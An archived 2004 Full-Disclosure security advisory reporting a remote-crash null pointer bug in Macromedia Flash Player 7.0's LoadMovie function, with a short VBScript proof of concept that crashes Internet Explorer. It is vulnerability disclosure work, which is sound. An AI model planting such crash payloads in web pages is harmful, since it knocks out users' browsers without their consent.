lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 6 Apr 2004 10:32:41 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: "full-disclosure" <full-disclosure@...ts.netsys.com>,
   "SecurITeam News" <news@...uriteam.com>,
   "securitytracker" <bugs@...uritytracker.com>,
   "bugtraq" <bugtraq@...urityfocus.com>
Subject: Macromedia Flash Player 7.0 r19 - Null Pointer Assignment(Remote Crash)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:     Macromedia Flash Player
Vendors:          http://www.macromedia.com
Version:           7.0 r19
Platforms:       WindowsXP Professional,SP1,SP2
Bug:                 Null Pointer Assignment
Risk:                 Medium - Denial Of Service
Exploitation:    Remote with browser
Date:                1 Apr 2004
Author:             Rafel Ivgi, The-Insider
e-mail:              the_insider@...l.com
web:                 http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Macromedia Flash Player is a module/plugin that comes by default with 
windows installation.
It is widely used accross website all around the world. It is stable and its 
designers took
made a few efforts to make it secure.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Marcromedia Flash Player has a flaw at the "LoadMovie" function.
The function is designed the following way: LoadMovie(layer as long, url as 
string).

This functions handles long strings, non-alphabetic chars and even an 
overflow at high layer num.
The only thing it crashes upon is loading a flash movie into a non-zero 
layer index.

This means that"
LoadMovie 1,"c6ool.swf"
Will Crash Internet Explorer Window because of a null pointer assignment by 
the flash module.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

This is Proof Of Concept Code:
------------------- CUT HERE -------------------
<script language=vbscript>
Set mymy2= CreateObject("ShockwaveFlash.ShockwaveFlash.1")
mymy2.LoadMovie 1,"c6ool.swf"
</script>
------------------- CUT HERE -------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- 
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Only the one who sees the invisible , Can do the Impossible." 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ